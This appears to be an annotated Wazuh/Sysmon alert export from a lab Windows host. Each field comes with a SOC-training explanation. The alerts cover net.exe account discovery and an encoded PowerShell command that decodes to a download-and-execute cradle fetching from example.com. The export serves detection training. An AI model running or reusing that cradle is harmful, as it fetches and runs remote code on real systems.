agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534214.965113 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:48.0453368Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282223 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:48.034
ProcessGuid: {94294ddc-bcc4-680a-b00a-000000000e00}
ProcessId: 11608
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-bcaa-680a-930a-000000000e00}
ParentProcessId: 11676
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net.exe accounts
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:48.034 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcc4-680a-b00a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11608 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcaa-680a-930a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 11676 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net.exe accounts No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534214.970171 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:49.1508187Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282233 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:49.142
ProcessGuid: {94294ddc-bcc5-680a-b10a-000000000e00}
ProcessId: 12028
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net user administrator
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:49.142 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcc5-680a-b10a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12028 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net user administrator No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 19 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534214.975453 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:49.7003462Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282235 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:46.658
ProcessGuid: {94294ddc-bcc2-680a-ae0a-000000000e00}
ProcessId: 1148
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcc1-680a-ac0a-000000000e00}
ParentProcessId: 8908
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:46.658 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcc2-680a-ae0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 1148 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcc1-680a-ac0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 8908 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 23 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534214.983515 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:49.9158126Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282239 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:35:49.897
ProcessGuid: {94294ddc-bcc2-680a-ae0a-000000000e00}
ProcessId: 1148
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_0gxqrd3j.oe2.ps1
CreationUtcTime: 2025-04-24 22:35:49.897
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:49.897 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcc2-680a-ae0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 1148 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_0gxqrd3j.oe2.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:35:49.897 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534215.986279 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:51.6610611Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282272 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:51.490
ProcessGuid: {94294ddc-bcc7-680a-b50a-000000000e00}
ProcessId: 10700
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 user administrator
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-bcc5-680a-b10a-000000000e00}
ParentProcessId: 12028
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net user administrator
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:51.490 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcc7-680a-b50a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10700 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 user administrator No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
